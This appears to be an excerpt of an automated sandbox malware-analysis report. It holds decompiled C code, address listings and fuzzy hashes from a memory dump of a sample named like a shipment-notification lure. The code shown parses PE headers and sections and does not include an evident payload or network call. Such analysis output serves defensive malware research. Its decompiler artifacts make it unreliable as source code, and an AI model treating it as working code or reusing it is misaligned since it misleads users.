																	E01B237F5(_t353, 0);
																}
																E01B20413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01B19B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E01B102D6(_t174);
																}
																L01B077F0( *0x1bd7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E01B1C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L01AFEC7F(_t353);
										L01B119B8(_t287, 0, _t353, 0);
										_t200 = E01AEF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x1bdb2f8 |  *0x1bdb2fc) == 0 || ( *0x1bdb2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return L01B2B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x1bdb2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01B96B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01B96AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E01AFE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L01AFEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01B29730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E01AFE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01AF8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01B23C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                                0x01afd5f2
                                                                                0x01afd5f5
                                                                                0x01afd5f5
                                                                                0x01afd5fd
                                                                                0x01afd600
                                                                                0x01afd60a
                                                                                0x01afd60d
                                                                                0x01afd617
                                                                                0x01afd61d
                                                                                0x01afd627
                                                                                0x01afd62e
                                                                                0x01afd911
                                                                                0x01afd913
                                                                                0x00000000
                                                                                0x01afd919
                                                                                0x01afd919
                                                                                0x01afd919
                                                                                0x01afd634
                                                                                0x01afd634
                                                                                0x01afd634
                                                                                0x01afd634
                                                                                0x01afd640
                                                                                0x01afd8bf
                                                                                0x00000000
                                                                                0x01afd646
                                                                                0x01afd646
                                                                                0x01afd64d
                                                                                0x01afd652
                                                                                0x01b4b2fc
                                                                                0x01b4b2fc
                                                                                0x01b4b302
                                                                                0x01b4b33b
                                                                                0x01b4b341
                                                                                0x00000000
                                                                                0x01b4b304
                                                                                0x01b4b304
                                                                                0x01b4b319
                                                                                0x01b4b31e
                                                                                0x01b4b324
                                                                                0x01b4b326
                                                                                0x01b4b332
                                                                                0x01b4b347
                                                                                0x01b4b34c
                                                                                0x01b4b351
                                                                                0x01b4b35a
                                                                                0x00000000
                                                                                0x01b4b328
                                                                                0x01b4b328
                                                                                0x00000000
                                                                                0x01b4b328
                                                                                0x01b4b326
                                                                                0x01afd658
                                                                                0x01afd658
                                                                                0x01afd65b
                                                                                0x01afd665
                                                                                0x00000000
                                                                                0x01afd66b
                                                                                0x01afd66b
                                                                                0x01afd66b
                                                                                0x01afd66b
                                                                                0x01afd66d
                                                                                0x01afd672
                                                                                0x01afd67a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afd680
                                                                                0x01afd686
                                                                                0x01afd8ce
                                                                                0x01afd8d4
                                                                                0x01afd8dd
                                                                                0x01afd8e0
                                                                                0x01afd68c
                                                                                0x01afd691
                                                                                0x01afd69d
                                                                                0x01afd6a2
                                                                                0x01afd6a7
                                                                                0x01afd6b0
                                                                                0x01afd6b5
                                                                                0x01afd6e0
                                                                                0x01afd6b7
                                                                                0x01afd6b7
                                                                                0x01afd6b9
                                                                                0x01afd6b9
                                                                                0x01afd6bb
                                                                                0x01afd6bd
                                                                                0x01afd6ce
                                                                                0x01afd6d0
                                                                                0x01afd6d2
                                                                                0x01b4b363
                                                                                0x01b4b365
                                                                                0x00000000
                                                                                0x01b4b36b
                                                                                0x00000000
                                                                                0x01b4b36b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afd6bf
                                                                                0x01afd6bf
                                                                                0x01afd6e5
                                                                                0x01afd6e7
                                                                                0x01afd6e9
                                                                                0x01afd6ec
                                                                                0x01afd6ec
                                                                                0x01afd6ef
                                                                                0x01afd6f5
                                                                                0x01afd6f9
                                                                                0x01afd6fb
                                                                                0x01afd6fd
                                                                                0x01afd701
                                                                                0x01afd703
                                                                                0x01afd70a
                                                                                0x01afd70a
                                                                                0x01afd701
                                                                                0x01afd710
                                                                                0x01afd710
                                                                                0x01afd6c1
                                                                                0x01afd6c1
                                                                                0x01afd6c6
                                                                                0x01b4b36d
                                                                                0x01b4b36f
                                                                                0x00000000
                                                                                0x01b4b375
                                                                                0x01b4b375
                                                                                0x01b4b375
                                                                                0x00000000
                                                                                0x01b4b375
                                                                                0x00000000
                                                                                0x01afd6cc
                                                                                0x01afd6d8
                                                                                0x01afd6d8
                                                                                0x01afd6d8
                                                                                0x00000000
                                                                                0x01afd6c6
                                                                                0x01afd6bf
                                                                                0x00000000
                                                                                0x01afd6da
                                                                                0x01afd6da
                                                                                0x01afd716
                                                                                0x01afd71b
                                                                                0x01afd720
                                                                                0x01afd726
                                                                                0x01afd726
                                                                                0x01afd72d
                                                                                0x00000000
                                                                                0x01afd733
                                                                                0x01afd739
                                                                                0x01afd742
                                                                                0x01afd750
                                                                                0x01afd758
                                                                                0x01afd764
                                                                                0x01afd776
                                                                                0x01afd77a
                                                                                0x01afd783
                                                                                0x01afd928
                                                                                0x01afd92c
                                                                                0x01afd93d
                                                                                0x01afd944
                                                                                0x01afd94f
                                                                                0x01afd954
                                                                                0x01afd956
                                                                                0x01afd95f
                                                                                0x01afd961
                                                                                0x01afd973
                                                                                0x01afd973
                                                                                0x01afd956
                                                                                0x01afd944
                                                                                0x01afd92c
                                                                                0x01afd78b
                                                                                0x01b4b394
                                                                                0x01afd791
                                                                                0x01afd798
                                                                                0x01b4b3a3
                                                                                0x01b4b3bb
                                                                                0x01b4b3bb
                                                                                0x01afd7a5
                                                                                0x01afd866
                                                                                0x01afd870
                                                                                0x01afd892
                                                                                0x01afd898
                                                                                0x01afd89e
                                                                                0x01afd8a0
                                                                                0x01afd8a6
                                                                                0x01afd8ac
                                                                                0x01afd8ae
                                                                                0x01afd8b4
                                                                                0x01afd8b4
                                                                                0x01afd8ae
                                                                                0x01afd7a5
                                                                                0x01afd78b
                                                                                0x01afd7b1
                                                                                0x01b4b3c5
                                                                                0x01b4b3c5
                                                                                0x01afd7c3
                                                                                0x01afd7ca
                                                                                0x01afd7e5
                                                                                0x01afd7eb
                                                                                0x01afd8eb
                                                                                0x01afd8ed
                                                                                0x00000000
                                                                                0x01afd8f3
                                                                                0x01afd8f3
                                                                                0x01afd8f3
                                                                                0x00000000
                                                                                0x01afd8ed
                                                                                0x01afd7cc
                                                                                0x01afd7cc
                                                                                0x01afd7d2
                                                                                0x00000000
                                                                                0x01afd7d4
                                                                                0x01afd7d4
                                                                                0x01afd7d7
                                                                                0x01afd7df
                                                                                0x01b4b3d4
                                                                                0x01b4b3d9
                                                                                0x01b4b3dc
                                                                                0x01b4b3dc
                                                                                0x01b4b3df
                                                                                0x01b4b3e2
                                                                                0x01b4b468
                                                                                0x01b4b46d
                                                                                0x01b4b46f
                                                                                0x01b4b46f
                                                                                0x01b4b475
                                                                                0x01afd8f8
                                                                                0x01afd8f9
                                                                                0x01afd8fd
                                                                                0x01b4b3e8
                                                                                0x01b4b3e8
                                                                                0x01b4b3eb
                                                                                0x01b4b3ed
                                                                                0x00000000
                                                                                0x01b4b3ef
                                                                                0x01b4b3ef
                                                                                0x01b4b3f1
                                                                                0x01b4b3f4
                                                                                0x01b4b3fe
                                                                                0x01b4b404
                                                                                0x01b4b409
                                                                                0x01b4b40e
                                                                                0x01b4b410
                                                                                0x01b4b410
                                                                                0x01b4b414
                                                                                0x01b4b414
                                                                                0x01b4b41b
                                                                                0x01b4b420
                                                                                0x01b4b423
                                                                                0x01b4b425
                                                                                0x01b4b427
                                                                                0x01b4b42a
                                                                                0x01b4b42d
                                                                                0x01b4b42d
                                                                                0x01b4b42a
                                                                                0x01b4b432
                                                                                0x01b4b436
                                                                                0x01b4b438
                                                                                0x01b4b43b
                                                                                0x01b4b43b
                                                                                0x01b4b449
                                                                                0x01b4b44e
                                                                                0x01b4b454
                                                                                0x01b4b458
                                                                                0x01b4b458
                                                                                0x01b4b45d
                                                                                0x00000000
                                                                                0x01b4b45d
                                                                                0x01b4b3ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afd7df
                                                                                0x01afd7d2
                                                                                0x01afd7ca
                                                                                0x01b4b37c
                                                                                0x01b4b37e
                                                                                0x01b4b385
                                                                                0x01b4b38a
                                                                                0x00000000
                                                                                0x01b4b38a
                                                                                0x01afd742
                                                                                0x01afd7f1
                                                                                0x01afd7f8
                                                                                0x01b4b49b
                                                                                0x01b4b49b
                                                                                0x01afd800
                                                                                0x01afd837
                                                                                0x01afd843
                                                                                0x01afd845
                                                                                0x01afd847
                                                                                0x01afd84a
                                                                                0x01afd84b
                                                                                0x01afd84e
                                                                                0x01afd857
                                                                                0x01afd818
                                                                                0x01afd824
                                                                                0x01afd831
                                                                                0x01b4b4a5
                                                                                0x01b4b4ab
                                                                                0x01b4b4b3
                                                                                0x01b4b4b8
                                                                                0x01b4b4bb
                                                                                0x00000000
                                                                                0x01b4b4c1
                                                                                0x01b4b4c1
                                                                                0x01b4b4c8
                                                                                0x00000000
                                                                                0x01b4b4ce
                                                                                0x01b4b4d4
                                                                                0x01b4b4e1
                                                                                0x01b4b4e3
                                                                                0x01b4b4e5
                                                                                0x00000000
                                                                                0x01b4b4eb
                                                                                0x01b4b4f0
                                                                                0x01b4b4f2
                                                                                0x01afdac9
                                                                                0x01afdacc
                                                                                0x01afdacf
                                                                                0x01afdad1
                                                                                0x01afdd78
                                                                                0x01afdd78
                                                                                0x01afdcf2
                                                                                0x00000000
                                                                                0x01afdad7
                                                                                0x01afdad9
                                                                                0x01afdadb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afdae1
                                                                                0x01afdae1
                                                                                0x01afdae4
                                                                                0x01afdae6
                                                                                0x01b4b4f9
                                                                                0x01b4b4f9
                                                                                0x01b4b500
                                                                                0x01afdaec
                                                                                0x01afdaec
                                                                                0x01afdaf5
                                                                                0x01afdaf8
                                                                                0x01afdafb
                                                                                0x01afdb03
                                                                                0x01afdb11
                                                                                0x01afdb16
                                                                                0x01afdb19
                                                                                0x01afdb1b
                                                                                0x01b4b52c
                                                                                0x01b4b531
                                                                                0x01b4b534
                                                                                0x01afdb21
                                                                                0x01afdb21
                                                                                0x01afdb24
                                                                                0x01afdcd9
                                                                                0x01afdce2
                                                                                0x01afdce5
                                                                                0x01afdd6a
                                                                                0x01afdd6d
                                                                                0x00000000
                                                                                0x01afdd73
                                                                                0x01b4b51a
                                                                                0x01b4b51c
                                                                                0x01b4b51f
                                                                                0x01b4b524
                                                                                0x00000000
                                                                                0x01b4b524
                                                                                0x01afdce7
                                                                                0x01afdce7
                                                                                0x01afdce7
                                                                                0x00000000
                                                                                0x01afdce7
                                                                                0x00000000
                                                                                0x01afdb2a
                                                                                0x01afdb2c
                                                                                0x01afdb31
                                                                                0x01afdb33
                                                                                0x01afdb36
                                                                                0x01afdb39
                                                                                0x01afdb3b
                                                                                0x01afdb66
                                                                                0x01afdb66
                                                                                0x01afdb3d
                                                                                0x01afdb3d
                                                                                0x01afdb3e
                                                                                0x01afdb46
                                                                                0x01afdb47
                                                                                0x01afdb49
                                                                                0x01afdb4c
                                                                                0x01afdb53
                                                                                0x01afdb55
                                                                                0x01afdb58
                                                                                0x01afdb5a
                                                                                0x01b4b50a
                                                                                0x01b4b50f
                                                                                0x01b4b512
                                                                                0x01afdb60
                                                                                0x01afdb60
                                                                                0x01afdb63
                                                                                0x01afdb63
                                                                                0x00000000
                                                                                0x01afdb63
                                                                                0x01afdb5a
                                                                                0x01afdb3b
                                                                                0x01afdb24
                                                                                0x01afdb69
                                                                                0x01afdb69
                                                                                0x01afdb6c
                                                                                0x01afdb6f
                                                                                0x01afdb74
                                                                                0x01b4b557
                                                                                0x01b4b557
                                                                                0x01b4b55e
                                                                                0x01afdb7a
                                                                                0x01afdb7c
                                                                                0x01afdb7f
                                                                                0x01afdb82
                                                                                0x01afdb85
                                                                                0x00000000
                                                                                0x01afdb8b
                                                                                0x01afdb8b
                                                                                0x01afdb8d
                                                                                0x01afdb9b
                                                                                0x01afdb9b
                                                                                0x01afdb9d
                                                                                0x01afdba0
                                                                                0x01afdba2
                                                                                0x01afdba4
                                                                                0x01afdba7
                                                                                0x01afdba9
                                                                                0x01afdbae
                                                                                0x01afdbae
                                                                                0x01afdbb1
                                                                                0x01afdbb4
                                                                                0x01afdbb4
                                                                                0x01afdbb7
                                                                                0x01afdbba
                                                                                0x01afdcd2
                                                                                0x01afdcd4
                                                                                0x00000000
                                                                                0x01afdbc0
                                                                                0x01afdbc0
                                                                                0x01afdbd2
                                                                                0x01afdbd7
                                                                                0x01afdbda
                                                                                0x01afdbdd
                                                                                0x01afdbdf
                                                                                0x00000000
                                                                                0x01afdbe5
                                                                                0x01afdbe5
                                                                                0x01afdbee
                                                                                0x01afdbf1
                                                                                0x01b4b541
                                                                                0x01b4b544
                                                                                0x00000000
                                                                                0x01b4b546
                                                                                0x01b4b546
                                                                                0x00000000
                                                                                0x01b4b546
                                                                                0x01afdbf7
                                                                                0x01afdbf7
                                                                                0x01afdbfd
                                                                                0x01afdbfd
                                                                                0x01afdbff
                                                                                0x01afdc0b
                                                                                0x01afdc15
                                                                                0x01afdc1b
                                                                                0x01afdc1d
                                                                                0x01afdc21
                                                                                0x01afdc21
                                                                                0x01afdc23
                                                                                0x01afdc23
                                                                                0x01afdc26
                                                                                0x01afdc29
                                                                                0x01afdc2b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afdc31
                                                                                0x01afdc34
                                                                                0x01afdc36
                                                                                0x01afdcbf
                                                                                0x01afdcbf
                                                                                0x01afdcc2
                                                                                0x00000000
                                                                                0x01afdc3c
                                                                                0x01afdc41
                                                                                0x01afdc43
                                                                                0x00000000
                                                                                0x01afdc45
                                                                                0x01afdc45
                                                                                0x01afdc47
                                                                                0x00000000
                                                                                0x01afdc4d
                                                                                0x01afdc4d
                                                                                0x01afdc50
                                                                                0x01afdc52
                                                                                0x01afdc55
                                                                                0x01afdcfa
                                                                                0x01afdcfe
                                                                                0x01afdd08
                                                                                0x01afdd0a
                                                                                0x01afdd0c
                                                                                0x00000000
                                                                                0x01afdd12
                                                                                0x01afdd15
                                                                                0x01afdd2d
                                                                                0x01afdd2f
                                                                                0x01afdd32
                                                                                0x01afdd35
                                                                                0x00000000
                                                                                0x01afdd35
                                                                                0x01afdc5b
                                                                                0x01afdc5b
                                                                                0x01afdc5e
                                                                                0x01afdc61
                                                                                0x01afdc64
                                                                                0x01afdc67
                                                                                0x01afdc67
                                                                                0x01afdc6a
                                                                                0x01afdc6c
                                                                                0x01afdc8e
                                                                                0x01afdc8e
                                                                                0x01afdc91
                                                                                0x01afdc93
                                                                                0x01afdcce
                                                                                0x01afdcce
                                                                                0x01afdc95
                                                                                0x01afdc9c
                                                                                0x01afdc6e
                                                                                0x01afdc72
                                                                                0x01afdc75
                                                                                0x01afdc77
                                                                                0x01afdc79
                                                                                0x01b4b551
                                                                                0x01b4b551
                                                                                0x00000000
                                                                                0x01afdc7f
                                                                                0x01afdc7f
                                                                                0x01afdc81
                                                                                0x00000000
                                                                                0x01afdc83
                                                                                0x01afdc86
                                                                                0x01afdc88
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afdc88
                                                                                0x01afdc81
                                                                                0x01afdc79
                                                                                0x01afdc6c
                                                                                0x01afdc55
                                                                                0x01afdc47
                                                                                0x01afdc43
                                                                                0x00000000
                                                                                0x01afdc36
                                                                                0x01afdc23
                                                                                0x00000000
                                                                                0x01afdbff
                                                                                0x01afdbf1
                                                                                0x01afdbdf
                                                                                0x01afdb8f
                                                                                0x01afdb92
                                                                                0x01afdb95
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afdb95
                                                                                0x01afdb8d
                                                                                0x01afdb85
                                                                                0x01afdb74
                                                                                0x01afdc9f
                                                                                0x01afdca2
                                                                                0x01afdcb0
                                                                                0x01afdcb0
                                                                                0x01afdad1
                                                                                0x01b4b4e5
                                                                                0x01b4b4c8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afd831
                                                                                0x00000000
                                                                                0x01afd800
                                                                                0x01b4b47f
                                                                                0x01b4b485
                                                                                0x00000000
                                                                                0x01b4b485
                                                                                0x01afd665
                                                                                0x01afd652
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aaae0a2e5f0334d7a517d222edbf07cca0e472ac927d6a37820ffd474d740911
                                                                                • Instruction ID: 31c5f2225a54606d83d6b2c8cdf4d06e3b6b936aac934a0e6c66af8c6d5062b7
                                                                                • Opcode Fuzzy Hash: aaae0a2e5f0334d7a517d222edbf07cca0e472ac927d6a37820ffd474d740911
                                                                                • Instruction Fuzzy Hash: 22E1D331A01356CFEB3ACFA9C990B69BBB2BF45304F0441DDEB099B291D7349985CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AF849B Relevance: .3, Instructions: 290COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E01AF849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x1bbf9c0);
				E01B3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1bd7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E01AFCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01B02280( *[fs:0x30], 0x1bd8550);
						_t139 =  *0x1bd7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E01B1F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E01AFFFB0(_t193, _t235, 0x1bd8550);
								L5:
								return E01B3D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01AE1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1bd7b9c; // 0x0
							_t235 = L01B04620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1bd7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = L01B1A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E01AFFFB0(_t193, _t235, 0x1bd8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L01B077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L01B077F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1bd7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1bd7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E01B237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1bd7b9c; // 0x0
									_t214 = L01B04620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
